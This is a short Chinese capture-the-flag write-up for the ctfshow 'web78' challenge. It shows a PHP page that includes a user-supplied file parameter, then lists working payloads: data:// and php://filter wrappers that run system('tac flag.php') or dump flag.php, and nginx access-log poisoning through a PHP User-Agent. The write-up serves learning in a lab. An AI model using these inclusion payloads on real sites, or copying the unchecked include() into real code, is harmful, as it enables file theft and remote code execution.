[ctfshow web入门] web78

一口一个橘子2025-06-04 19:01

信息收集

表面上没有任何过滤，自由发挥

php 复制代码

if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

解题

这些解法都在web32解释过，不再详细解释，有需要点击超链接： $ctfshow web入门$ web32

伪协议

php 复制代码

?file=data://text/plain,<?php system("tac flag.php") ?>
?file=php://filter/read=convert.base64-encode/resource=flag.php
?file=php://filter/read=convert.iconv.ascii.utf-16/resource=flag.php

日志包含

php 复制代码

?file=/var/log/nginx/access.log

user-agent里写上

php 复制代码

<?php system('ls'); ?>
<?php system('tac flag.php'); ?>

web124 目录 web79